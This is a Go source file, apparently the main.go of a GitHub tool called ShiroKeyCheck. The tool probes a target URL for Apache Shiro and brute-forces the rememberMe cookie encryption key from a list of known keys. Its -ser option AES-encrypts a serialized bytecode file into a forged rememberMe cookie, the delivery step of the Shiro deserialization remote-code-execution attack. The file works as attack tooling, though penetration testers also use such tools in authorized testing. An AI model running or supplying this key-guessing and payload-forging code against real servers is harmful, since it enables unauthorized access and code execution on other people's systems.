-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathmain.go
executable file
·108 lines (100 loc) · 3.68 KB
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
package main
//CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" -o ShiroKeyCheck_linux-arm64 main.go
//CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" -o ShiroKeyCheck_windows-amd64.exe main.go
//go build -ldflags="-s -w" -o ShiroKeyCheck_darwin-arm64 main.go && upx -9 server
import (
"ShiroKeyCheck/AES_Encrypt"
"ShiroKeyCheck/Function"
"ShiroKeyCheck/GlobalVar"
"encoding/base64"
"flag"
"fmt"
"io/ioutil"
"os"
"strings"
"time"
"github.com/briandowns/spinner"
)
func GetCommandArgs() {
flag.StringVar(&GlobalVar.UserAgent, "ua", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36", "User-Agent")
flag.StringVar(&GlobalVar.Url, "u", "", "Target url(Needed)")
flag.StringVar(&GlobalVar.Method, "m", "GET", "Request Method")
flag.StringVar(&GlobalVar.PostContent, "content", "", "POST Method Content")
flag.IntVar(&GlobalVar.Timeout, "timeout", 60, "Request timeout time(s)")
flag.IntVar(&GlobalVar.Interval, "interval", 0, "Each request interval time(s)")
flag.StringVar(&GlobalVar.HttpProxy, "proxy", "", "Set up http proxy e.g. http://127.0.0.1:8080")
flag.StringVar(&GlobalVar.Pointkey, "key", "", "Specify the key and use CBC and GCM modes for detection")
flag.StringVar(&GlobalVar.Aes_mode, "mode", "", "Specify CBC or GCM encryption mode (only valid for -ser parameter)")
flag.StringVar(&GlobalVar.SerFile, "ser", "", "Encrypt the bytecode file to generate the RememberMe field")
flag.StringVar(&GlobalVar.RespHeader, "respheader", "rememberMe", "Customize the header name in the response packet to be detected")
flag.StringVar(&GlobalVar.ReqHeader, "reqcookie", "rememberMe", "Customize the cookie name in the request packet to be detected")
flag.Parse()
}
func ShiroCheck() {
if !Function.HttpRequset("wotaifu") {
fmt.Println("Shiro Exist!")
} else {
fmt.Println("Shiro Not Exist!")
os.Exit(1)
}
}
func KeyCheck() {
Content, _ := base64.StdEncoding.DecodeString(GlobalVar.CheckContent)
//指定key的检测
if GlobalVar.Pointkey != "" {
time.Sleep(time.Duration(GlobalVar.Interval) * time.Second) //设置请求间隔
if !Function.FindTheKey(GlobalVar.Pointkey, Content) {
fmt.Println("Key is incorrect!")
}
} else {
//检测所有key
isFind := false
for i := range GlobalVar.Shirokeys {
time.Sleep(time.Duration(GlobalVar.Interval) * time.Second) //设置请求间隔
isFind = Function.FindTheKey(GlobalVar.Shirokeys[i], Content)
if isFind {
break
}
}
if !isFind {
fmt.Println("Key not found..")
}
}
}
func RememberMeGen() {
Content, _ := ioutil.ReadFile(GlobalVar.SerFile)
if GlobalVar.Pointkey == "" {
fmt.Println("[Error] You must specify the -key parameter!")
os.Exit(1)
}
key, _ := base64.StdEncoding.DecodeString(GlobalVar.Pointkey)
if strings.ToUpper(GlobalVar.Aes_mode) == "CBC" {
RememberMe := AES_Encrypt.AES_CBC_Encrypt(key, Content) //AES CBC加密
fmt.Println("[+] rememberMe=", RememberMe)
} else if strings.ToUpper(GlobalVar.Aes_mode) == "GCM" {
RememberMe := AES_Encrypt.AES_GCM_Encrypt(key, Content) //AES GCM加密
fmt.Println("[+] rememberMe=", RememberMe)
} else {
fmt.Println("[Error] Please specify the correct encryption mode, CBC or GCM!(-mode)")
os.Exit(1)
}
}
func main() {
GetCommandArgs()
if GlobalVar.SerFile != "" {
//反序列化,rememberMe字段生成
RememberMeGen()
} else {
if GlobalVar.Url != "" {
s := spinner.New(spinner.CharSets[33], 100*time.Millisecond, spinner.WithWriter(os.Stderr))
s.Start()
ShiroCheck() //检测是否存在shiro
KeyCheck() //key的检测
s.Stop()
} else {
flag.Usage()
fmt.Println("[Error] Url must be specified.(-url)")
os.Exit(1)
}
}
}